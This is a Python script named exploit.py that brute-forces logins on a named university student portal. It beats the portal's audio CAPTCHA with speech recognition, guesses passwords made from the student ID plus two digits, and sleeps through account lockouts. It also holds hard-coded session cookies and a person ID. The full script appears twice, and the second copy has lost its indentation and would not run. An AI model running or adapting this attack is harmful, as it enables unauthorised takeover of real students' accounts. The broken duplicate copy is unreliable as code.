sec-zone/exploit.py

## exploit.py
import requests
from bs4 import BeautifulSoup
import speech_recognition as sr
import time

baseURL = "[آدرس سامانه]"
loginURL = baseURL + "LoginPage.aspx"
filename = "audio.wav"
cookies = {"ASP.NET_SessionId": "3k1dee0lo2sa3yd22vv3vvfv", "__AntiXsrfToken": "f7b52679d7cb4d498cc3e1b3992e84a7", "MultiLoginGuardCookie": "UniqueCode=c67dd977-298b-4cc2-b5d0-d99fe85f5f3c&PersonId=9558"}
viewState = ""
viewStateGenerator = ""

httpProxy  = {"http":"http://127.0.0.1:8080"}

def getCaptchaText():
    global viewState, viewStateGenerator, httpProxy
    loginPageHTML = requests.get(loginURL, cookies=cookies,  proxies=httpProxy)

    soup = BeautifulSoup(loginPageHTML.content, 'html.parser')

    captchaImg = soup.find(id="ctl00_mainContent_myRadCaptcha_CaptchaImageUP")
    viewState = soup.find(id="__VIEWSTATE")['value']
    viewStateGenerator = soup.find(id="__VIEWSTATEGENERATOR")['value']

    #print(viewState['value'])

    #print(captchaImg['src'])

    audioUrl = captchaImg['src'].replace('type=rca', 'type=cah')
    audioUrl = baseURL + audioUrl

    #print(audioUrl)

    r = requests.get(audioUrl, allow_redirects=True, cookies=cookies,proxies=httpProxy)
    open(filename, 'wb').write(r.content)

    r = sr.Recognizer()

    captchaText =""

    with sr.AudioFile(filename) as source:
        audioData = r.record(source)
        captchaText = r.recognize_google(audioData)
        captchaText = captchaText.replace(" ","")
        captchaText = captchaText.replace("to","2")
        captchaText = captchaText.replace("euro","0")
        captchaText = captchaText.replace("fine","5")
        captchaText = captchaText.replace("for","4")
        captchaText = captchaText.replace("is","8")
        captchaText = captchaText.replace("two","2")
        captchaText = captchaText.replace("three","3")

    #print(captchaText)
    #print(cookies)
    return captchaText

def tryToLogin(username=1, password=1):
    isWrongCaptcha = True
    while(isWrongCaptcha):
        captchaTxt = getCaptchaText()
        burp0_url = baseURL + "LoginPage.aspx"
        burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://lms7.razavi.pnu.ac.ir", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://lms7.razavi.pnu.ac.ir/LoginPage.aspx", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
        burp0_data = {"__VIEWSTATE": viewState, "__VIEWSTATEGENERATOR": viewStateGenerator, "__VIEWSTATEENCRYPTED": '', 'ctl00$mainContent$hdfPass': password, 'ctl00$mainContent$UserName': username, 'ctl00$mainContent$Password': "97016404689", 'ctl00$mainContent$myRadCaptcha$CaptchaTextBox': captchaTxt, 'ctl00$mainContent$LoginButton': '\xd9\x88\xd8\xb1\xd9\x88\xd8\xaf'}
        res = requests.post(burp0_url, headers=burp0_headers, cookies=cookies, data=burp0_data,proxies=httpProxy)
        print(res.status_code)
        if("حساب شما به مدت 5 دقیقه" in res.text):
            print("We must wait...")
            time.sleep(60*5)

        if("اطلاعات وارد شده معتبر نمی باشد" in res.text):
            print("Invalid creds.")
            return False

        if("کد وارد شده صحیح نمی باشد" in res.text):
            print("Wrong captcha")
            continue

        return True


        #print(res.content)

def bruteForce(username):
    passwords = ["%.2d" % i for i in range(100)]

    for passw in passwords:
        print("[!] username: " + username + " password: " + username+passw)
        if tryToLogin(username, username+passw):
            print("Hooraa!!!")
            return


bruteForce("[کد دانشجویی فرد]")
	import requests
	from bs4 import BeautifulSoup
	import speech_recognition as sr
	import time

	baseURL = "[آدرس سامانه]"
	loginURL = baseURL + "LoginPage.aspx"
	filename = "audio.wav"
	cookies = {"ASP.NET_SessionId": "3k1dee0lo2sa3yd22vv3vvfv", "__AntiXsrfToken": "f7b52679d7cb4d498cc3e1b3992e84a7", "MultiLoginGuardCookie": "UniqueCode=c67dd977-298b-4cc2-b5d0-d99fe85f5f3c&PersonId=9558"}
	viewState = ""
	viewStateGenerator = ""

	httpProxy = {"http":"http://127.0.0.1:8080"}

	def getCaptchaText():
	global viewState, viewStateGenerator, httpProxy
	loginPageHTML = requests.get(loginURL, cookies=cookies, proxies=httpProxy)

	soup = BeautifulSoup(loginPageHTML.content, 'html.parser')

	captchaImg = soup.find(id="ctl00_mainContent_myRadCaptcha_CaptchaImageUP")
	viewState = soup.find(id="__VIEWSTATE")['value']
	viewStateGenerator = soup.find(id="__VIEWSTATEGENERATOR")['value']

	#print(viewState['value'])

	#print(captchaImg['src'])

	audioUrl = captchaImg['src'].replace('type=rca', 'type=cah')
	audioUrl = baseURL + audioUrl

	#print(audioUrl)

	r = requests.get(audioUrl, allow_redirects=True, cookies=cookies,proxies=httpProxy)
	open(filename, 'wb').write(r.content)

	r = sr.Recognizer()

	captchaText =""

	with sr.AudioFile(filename) as source:
	audioData = r.record(source)
	captchaText = r.recognize_google(audioData)
	captchaText = captchaText.replace(" ","")
	captchaText = captchaText.replace("to","2")
	captchaText = captchaText.replace("euro","0")
	captchaText = captchaText.replace("fine","5")
	captchaText = captchaText.replace("for","4")
	captchaText = captchaText.replace("is","8")
	captchaText = captchaText.replace("two","2")
	captchaText = captchaText.replace("three","3")

	#print(captchaText)
	#print(cookies)
	return captchaText

	def tryToLogin(username=1, password=1):
	isWrongCaptcha = True
	while(isWrongCaptcha):
	captchaTxt = getCaptchaText()
	burp0_url = baseURL + "LoginPage.aspx"
	burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://lms7.razavi.pnu.ac.ir", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://lms7.razavi.pnu.ac.ir/LoginPage.aspx", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
	burp0_data = {"__VIEWSTATE": viewState, "__VIEWSTATEGENERATOR": viewStateGenerator, "__VIEWSTATEENCRYPTED": '', 'ctl00$mainContent$hdfPass': password, 'ctl00$mainContent$UserName': username, 'ctl00$mainContent$Password': "97016404689", 'ctl00$mainContent$myRadCaptcha$CaptchaTextBox': captchaTxt, 'ctl00$mainContent$LoginButton': '\xd9\x88\xd8\xb1\xd9\x88\xd8\xaf'}
	res = requests.post(burp0_url, headers=burp0_headers, cookies=cookies, data=burp0_data,proxies=httpProxy)
	print(res.status_code)
	if("حساب شما به مدت 5 دقیقه" in res.text):
	print("We must wait...")
	time.sleep(60*5)

	if("اطلاعات وارد شده معتبر نمی باشد" in res.text):
	print("Invalid creds.")
	return False

	if("کد وارد شده صحیح نمی باشد" in res.text):
	print("Wrong captcha")
	continue

	return True



	#print(res.content)

	def bruteForce(username):
	passwords = ["%.2d" % i for i in range(100)]

	for passw in passwords:
	print("[!] username: " + username + " password: " + username+passw)
	if tryToLogin(username, username+passw):
	print("Hooraa!!!")
	return


	bruteForce("[کد دانشجویی فرد]")